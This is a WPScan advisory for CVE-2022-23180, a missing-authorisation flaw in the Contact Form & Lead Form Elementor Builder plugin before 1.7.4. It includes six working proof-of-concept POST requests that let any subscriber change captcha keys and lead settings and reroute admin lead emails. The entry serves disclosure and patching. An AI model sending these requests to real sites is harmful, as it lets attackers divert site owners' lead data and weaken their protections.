WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Contact Form & Lead Form Elementor Builder Plugin < 1.7.4 - Multiple Subscriber+ Settings Update

Description

The plugin doesn't have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings

Proof of Concept

PoC POST Request (ON/OFF Captcha):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption


PoC POST Request (Captcha Settings: Site Key & Secret Key):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings


PoC POST Request (Lead Receiving Method):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings


PoC POST Request (User Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings


PoC POST Request (Admin Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings


PoC POST Request (Remember this Form):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

form_id=1&action=RememberMeThisForm

Affects Plugins

lead-form-builder
Fixed in version 1.7.4

References

CVE
CVE-2022-23180
URL
https://plugins.trac.wordpress.org/changeset/2670484

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Yoru Oni

Submitter

Yoru Oni

Submitter website
https://profiles.wordpress.org/yoruoni
Verified

Yes

WPVDB ID
da87358a-3a72-4cf7-a2af-a266dd9b4290

Timeline

Publicly Published

2022-02-01 (about 12 months ago)

Added

2022-02-01 (about 12 months ago)

Last Updated

2022-04-13 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin